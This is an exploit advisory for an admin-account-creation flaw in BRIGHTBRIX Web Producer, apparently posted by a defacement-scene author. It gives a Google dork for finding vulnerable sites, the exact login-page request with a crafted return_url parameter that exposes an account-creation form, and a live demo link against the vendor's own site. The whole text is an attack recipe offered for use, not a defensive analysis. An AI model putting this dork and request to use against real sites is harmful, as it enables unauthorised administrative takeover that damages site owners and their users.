======================================================================================
Exploit Title : BRIGHTBRIX® Web Producer - Extending the Internet Add Admin Vulnerability
Author : Zaenal Arifin
Exploit Date : September 06, 2018
Software : https://www.brightbrix.com/
Vendor : https://www.brightbrix.com/
Version : -
Home : www.bandungdigitalsecurity.org
Tested on : Windows 7/10 64x - BackBox Linux 5.0 64x
Exploit Risk : Medium
======================================================================================
Proof of Concept :
Search in google browser or another browser and use the dork :
Dashboard for BRIGHTBRIX® Web Producer - Extending the Internet
and us ur brain to develop this dork.
and Use Exploit :
/user_admin/login_page.php?return_url=%2Fxampp%2Flang.php%3Fen
If vuln then you will find a form to create a new account
and fill in the active e-mail, and check your e-mail for activation of the code and creat ur password, if it is then it will go directly to the dashboard page.
Proof : > https://image.ibb.co/jCa2je/Pwnd.png
Demo : https://www.brightbrix.com/user_admin/login_page.php?return_url=%2Fxampp%2Flang.php%3Fen
===========================================
Contact Me :
https://www.facebook.com/darkvenom.gov
zaenalarifin.net@gmail.com
===========================================
======================================================================================
Special Thanks to : Familly Team_CC | AnonGhost | MilWorm | TeaMp0is0N | Fallaga Team
======================================================================================